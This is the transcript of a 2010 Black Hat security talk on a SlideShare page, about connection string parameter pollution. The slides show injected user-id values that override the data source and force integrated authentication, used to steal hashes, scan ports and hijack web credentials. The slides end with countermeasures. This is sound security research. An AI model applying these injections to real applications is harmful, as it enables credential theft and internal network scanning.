• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Connection String Parameter Pollution Attacks
 

Connection String Parameter Pollution Attacks

on

  • 4,742 views

Talk delivered by Chema Alonso and Jose Palazon "Palako" in BlackHat DC 2010 about Connection String Injection Parameter Pollution attacks.

Talk delivered by Chema Alonso and Jose Palazon "Palako" in BlackHat DC 2010 about Connection String Injection Parameter Pollution attacks.

Statistics

Views

Total Views
4,742
Views on SlideShare
4,237
Embed Views
505

Actions

Likes
3
Downloads
82
Comments
0

6 Embeds 505

http://elladodelmal.blogspot.com 255
http://www.elladodelmal.com 235
http://www.slideshare.net 9
http://translate.googleusercontent.com 3
http://www.elladodelmal.blogspot.com 2
http://webcache.googleusercontent.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Connection String Parameter Pollution Attacks Connection String Parameter Pollution Attacks Presentation Transcript

    • p
      Chema Alonso & Palako
      Informática 64
      Chema Alonso
      Informática 64
    • ConnectionStrings
      Define thewayanapplicationconnectsto data repository
      There are connectionstringsfor:
      RelationalDatabases (MSSQL, Oracle, MySQL,…)
      LDAP Directories
      Files
      Etc…
    • DatabasesConnectionStrings
      Data Source = myServerAddress;
      InitialCatalog = myDataBase;
      User Id = myUsername;
      Password = myPassword;
    • DB Connectionbuild up
    • Google Hacking
    • Google Hacking
    • UDL (Universal Data Links) Files
    • HowWebappconnectsto DB
      OperatingSystemAccounts
      DatabaseCredentials
      Data Source = myServerAddress;
      InitialCatalog = myDataBase;
      User Id =;
      Password =;
      Integrated Security = SSPI/True/Yes;
      Data Source = myServerAddress;
      InitialCatalog = myDataBase;
      User Id = myUsername;
      Password = myPassword;
      Integrated Security = No;
    • Usersauthenticatedby Web App
      Web applicationmanagestheloginprocess
      Syslogins
      1.- Web applicatonconnectsusingitscredentialstothedatabase.
      2.- Asksuserlogininformation.
      3.- Checkslogininformationaboutinfostored in customuserstable.
      Connectionstring
      Customuserstable
      Select id fromusers
      DatabaseEngine
      Apprunningon Web Server
    • UsersautheticatedbyDatabase
      Databaseenginemanagestheloginprocess
      1.- Web applicationasksforcredentials.
      2.- A connectionstringiscomposedwiththecredentialstoconnecttothedatabase.
      3.- Roles and permits are limitedbytheuserused in theconnectionstring
      Syslogins
      Connectionstring
      DatabaseEngine
      Apprunningon Web Server
    • ConnectionStringAttacks
      It´spossibletoinjectparametersintoconnectionstringsusingsemicolons as a separator
      Data Source = myServerAddress;
      InitialCatalog = myDataBase;
      Integrated Security = NO;
      User Id = myUsername;
      Password = myPassword; Encryption = Off;
    • ConnectionStringBuilder
      Available in .NET Framework 2.0
      Buildsecureconnectionstringsusingparameters
      It´snotpossibletoinjectintotheconnectionstring
    • Are peopleaware of this?
    • ConnectionStringParameterPollution
      The goal is to inject parameters in the connection string, whether they exist or not
      Had duplicated a parameter, the last value wins
      This behavior allows attackers to overwrite completely the connection string, therefore to manipulate the way the application will work and how should be the it authenticated
    • PollutionableBehavior
      Param1=Value A
      Param2=Value B
      Param1=Value C
      Param2=Value D
      DBConnectionObject
      Param1
      Param2
    • What can be done with CSPP?Overwrite a parameter
      Data Source=DB1
      UID=sa
      Data Source=DB2
      password=Pwnd!
      DBConnectionObject
      DataSource
      UID
      password
    • Scanningthe DMZ
      DevelopmentDatabase 1
      FinnacialDatabase
      Test Database
      ForgottenDatabase
      Internet
      FW
      Web app vulnerable to CSPP
      ProductionDatabase
      Data
      Source
    • Port Scanning a Server
      ProductionDatabase
      Server
      FW
      DataSource
      DB1,80
      Internet
      Web app vulnerable to CSPP
      DB1,21
      DB1,25
      DB1,1445
    • What can be done with CSPP?Add a parameter
      Data Source=DB1
      UID=sa
      Integrated Security=True
      password=Pwnd!
      DBConnectionObject
      DataSource
      UID
      password
    • CSPP Attack 1: Hash stealing
      1.- Run a Rogue Server onanaccessible IP address:
      Rogue_Server
      2.- Activate a snifferto catch theloginprocess
      Cain/Wireshark
      3.- Overwrite Data Sourceparameter
      Data_Source=Rogue_Server
      4.- Force Windows IntegratedAuthentication
      Integrated Security=true
    • CSPP Attack 1: Hash stealing
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=+’User_Value’+;
      Password=+’Password_Value’+;
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=;Data Source=Rogue_Server;
      Password=;Integrated Security=True;
    • CSSP 1:ASP.NET Enterprise Manager
    • CSPP Attack 2: Port Scanning
      1.- Duplicatethe Data Sourceparametersettingthe Target server and target porttobescanned. Data_Source=Target_Server,target_Port
      2.- Checkthe error messages:
      - No TCP Connection -> Port isclosed
      - No SQL Server -> Port is open
      - InvalidPassword -> SQL Server there!
    • CSPP Attack 2: Port Scanning
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=+’User_Value’+;
      Password=+’Password_Value’+;
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port;
      Password=;Integrated Security=True;
    • CSPP 2: myLittleAdmin
      Port is Open
    • CSPP 2: myLittleAdmin
      Port isClosed
    • CSPP Attack 3: Hijacking Web Credentials
      1.- Duplicate Data Sourceparametertothe target SQL Server
      Data_Source=Target_Server
      2.- Force Windows Authentication
      Integrated Security=true
      3.- Application pool in whichthe web appisrunningonwillsenditscredentials in orderto log in tothedatabaseengine.
    • CSPP Attack 3: Hijacking Web Credentials
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=+’User_Value’+;
      Password=+’Password_Value’+;
      Data source = SQL2005; initial catalog = db1;
      Integrated Security=no; user id=;Data Source=Target_Server;
      Password=;Integrated Security=true;
    • CSPP Attack 3: Web Data Administrator
    • CSPP Attack 3: myLittleAdmin/myLittleBackup
    • CSPP Attack 3: ASP.NET Enterprise Manager
    • OtherDatabases
      MySQL
      Does not support Integrated security
      It´s possible to manipulate the behavior of the web application, although
      Port Scanning
      Connect to internal/testing/for developing Databases
      Steal credentials
      Oracle supports integrated authority running on Windows and UNIX/Linux servers
      It´s possible to perform all described attacks
      Hash stealing
      Port Scanning
      Hijacking Web credentials
      Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance
    • Demo
      Demo
    • Scanner
      Proof of concept to test yournetwork
      Try a hijacking web credentialsattack
      Written in ASP.NET C#
      Free download (codeinclude of course)
      http://www.informatica64.com/csppScanner.aspx
    • CSPP Scanner
    • Scanner CSPP: Attacks
    • Demo
      Demo
    • myLittleAdmin/myLittleBackup
      myLittleToolsreleased a securyadvisory and a patchaboutthis
    • ASP.NET Enterprise Manager
      ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels.
      Fix the code yourself
    • ASP.NET Enterprise Manager
      ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels.
      Fix the code yourself
    • ASP.NET Web Data Admistrator
      ASP Web Data Administratorissecure in CodePlex web site, butnot in Microsoft web sitewhereanunsecureoldversioniswaspublished
    • Countermeasures
      Hardenyour firewall
      Outboundconnections
      Reviewyourinternalaccountspolicy
      Web application
      Web server
      DatabaseEngine
      Use ConnectionStringBuilder
      Filterthe;)
    • Questions?
      Contacto
      Chema Alonso
      chema@informatica64.com
      http://www.informatica64.com
      http://elladodelmal.blogspot.com
      http://twitter.com/chemaalonso
      José Palazón “Palako”
      palako@lateatral.com
      Authors
      Chema Alonso
      Manuel Fernández “The Sur”
      Alejandro Martín Bailón
      Antonio Guzmán